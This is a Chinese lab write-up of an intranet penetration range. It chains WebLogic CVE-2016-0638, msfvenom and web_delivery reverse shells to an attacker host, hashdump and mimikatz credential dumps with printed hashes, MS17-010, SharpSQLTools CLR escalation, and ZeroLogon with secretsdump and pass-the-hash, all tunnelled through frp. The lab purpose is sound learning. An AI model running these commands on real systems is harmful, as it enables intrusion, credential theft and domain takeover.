内网靶场初探

用户9691112

发布于 2023-05-18 13:41:39

6080

发布于 2023-05-18 13:41:39

文章被收录于专栏：quan9i的安全笔记

前言

内容写的很乱，因为第一次搞，有点不太熟练，所以各位师傅简单看看就好，写的比较好的文章，可以参考这两个 https://xz.aliyun.com/t/11588#toc-0 https://mp.weixin.qq.com

环境搭建

https://pan.baidu.com/s/1DOaDrsDsB2aW0sHSO_-fZQ
提取码: vbi2

拓扑图如下

具体我这里使用的攻击机和外网ip

kali:192.168.10.129
win2012:192.168.1

对于这些ip，我们只需要多设置几个网段就好，具体是在编辑中的虚拟网络编辑器

而后在各个机子的设置中使用这些网段就好

外网

假设我们这里已知了外网的ip为192.168.10.128，接下来我们用namp进行扫描，简单查看一下开放端口

nmap.exe -p1-65535 -Pn -A -T4 192.168.10.128
//这个命令行指令是使用nmap工具（nmap.exe）扫描IP地址为192.168.10.22的设备，扫描端口范围为
1-65535，使用-Pn选项表示不进行主机发现，使用-A选项表示进行操作系统指纹识别，使用-T4选项表示
扫描速度为最快。

这里扫描到7001端口开放，为WebLogic服务这里使用脚本扫描一下，看是否存在漏洞，脚本链接如下 https://github.com/rabbitmask/WeblogicScan

可以发现这里存在多个CVE漏洞，接下来我们使用注入工具尝试打一下，工具链接 https://github.com/sp4zcmd/WeblogicExploit-GUI/releases/tag/WeblogicExploit-GUI 使用第一个CVE漏洞进行尝试，即CVE-2016-0638

成功执行命令，接下来尝试注入内存马

使用冰蝎进行连接

成功连接，拿到主机权限。执行net time /domain查看是否在域内

不在域内，这个大概率是DMZ的机器，这里简单提一下DMZ

英文全名“Demilitarized Zone”，中文含义是“隔离区”。在安全领域的具体含义是“内外网防火墙之间的区域”。

这里的话我们的权限是管理员权限，所以不用再进行权限提升，这里开始进行信息搜集，首先查看一下是否存在杀软，指令如下

tasklist
//Tasklist命令是一个用来显示运行在本地或远程计算机上的所有进程的命令行工具

常见的杀软程序名字可以参考这里 https://github.com/wwl012345/AVCheck/blob/main/杀软识别.txt 这里的话可以看出不存在杀软，接下来进行msf上线，这里有两种方法

1、使用msfvenom生成木马文件
2、使用powercat进行反弹shell

法一

首先我们在kali中生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.10.129 LPORT=7777 -f exe > shell3.exe

接下来将shell3.exe移到靶机中

而后在kali中执行如下指令

msfconsole  //进入框架
use exploit/multi/handler                      //载入模块
set payload windows/meterpreter/reverse_tcp    //加载攻击负载核
set lhost 192.168.10.129                   //设置本地监听地址，和生成的木马地址一致
set lport 7777                          //设置本地监听端口，和生成的木马地址一致
run                            //开始执行，等待目标上线

接下来在靶机中执行木马文件

而后按理说在kali中查看即可上线，但我的是

回显 Meterpreter session 1 closed. Reason: Died，百度这个后得知可能的几个原因是

1、msf版本不兼容
2、payload不匹配
3、存在杀软

生成木马和监听，payload都是windows/meterpreter/reverse_tcp，所以感觉应该不存在问题，杀软这个之前也已经检测过，不存在杀软，所以这里的话由于认知浅薄，技术过菜，这种方式没能继续下去，这里我换了一种方式来进行反弹shell

法二

打开kali，指令如下

msfconsole  //进入框架
use exploit/multi/script/web_delivery //载入模块
set srvhost 192.168.10.129
set srvport 8080
set lhost 192.168.10.129
set lport 7777
//options
//show targets
set target 2
set payload windows/x64/meterpreter/reverse_tcp //set target 2是设置了powershell（psh）模块
exploit -j

接下来将powershell.exe这些代码进行复制，复制到冰蝎中执行

此时在kali攻击机中输入jobs

可以发现此时就有会话了，我们进入会话

session 2

成功上线

上线后查看一下自动登录的密码

run windows/gather/credentials/windows_autologin
hashdump //导出密码

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

md5解密

接下来查看网络信息

run get_local_subnets

发现有两个网段，上传fscan，用它扫一下内网网段

fscan64.exe -h 10.10.20.0/24 > result.txt

win7

发现新的机器10.10.20.7,同时扫出此机器疑似存在MS17-010漏洞接下来添加新路由

meterpreter > run autoroute -s 10.10.20.0/24 //添加路由
meterpreter > run autoroute -p //查看路由是否添加成功

接下来探测一下是否存在ms17-010漏洞指令如下

search ms17-010
use 1
set RHOSTS 10.10.20.7
run

然后这里会发现确实存在漏洞

接下来就去利用这个漏洞获取权限

use 2
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.10.20.7
set lport 11111
run

执行sessions -l

发现直接就是system权限，无需提权，接下来用mimikatz抓一下密码，指令如下

load mimikatz
creds_all

换用其他方式抓取密码

hashdump
run windows/gather/smart_hashdump
run windows/gather/credentials/windows_autologin

发现另一组用户john:admin!@#45 接下来去打mssql，用SharpSQLTools.exe

而后cs利用中转生成木马，通过GUI工具上传到可写目录，接下来去执行即可上线cs

而后再利用sharpSQLTools进行权限提升，即可拿下mssql这个

SharpSQLTools.exe 10.10.10.18 sa sa master install_clr
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami

最后一个域控的话，这里可以参考这篇文章 https://www.freebuf.com/articles/system/288515.html 我们这里首先验证漏洞是否存在，具体脚本看https://github.com/SecuraBV/CVE-2020-1472

回显Success，说明存在漏洞，接下来去重置域账号脚本参考https://github.com/dirkjanm/CVE-2020-1472

但要先安装要安装impacket(https://github.com/SecureAuthCorp/impacket) 安装方法：python -m pip install

而后读取域控中的hash

python secretsdump.py redteam.red/OWA$@10.10.10.8 -just-dc -no-pass

接下来有了hash，我们用wmiexec.py进行登录

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:028b70314013e1372797cff51298880e redteam.red/administrator@10.10.10.8 -codec gbk

成功拿到权限

后言

这个靶场Mssql那个机子有问题，怎么打都打不进去，msf执行语句无法上线

使用proxifier+SharpSQLToolsGUI上传cs的木马文件后也无法上线

所以最终cs也是没能成功上线，只上线了两台机子

不过也学到了很多东西，比如ew代理，frp内网穿透，这里再说一下我cs上线的时候，是如何通过win2012打win7的，拿下win2012后，我们在攻击机中设置frps，frps.ini内容如下

[common]
bind_addr =0.0.0.0
bind_port = 7000

然后我们在受害机，也就是win2012中配置frpc，frpc.ini内容如下

[common]
server_addr = 192.168.10.129
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5

然后执行frpc

回显success，此时代理就完成了，攻击机就相当于win2012了，接下来在攻击机用msf打就好了

msf6 > setg Proxies socks5:192.168.0.175:7777
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run

然后还有cs的使用，cs的话首先需要kali开启teamserver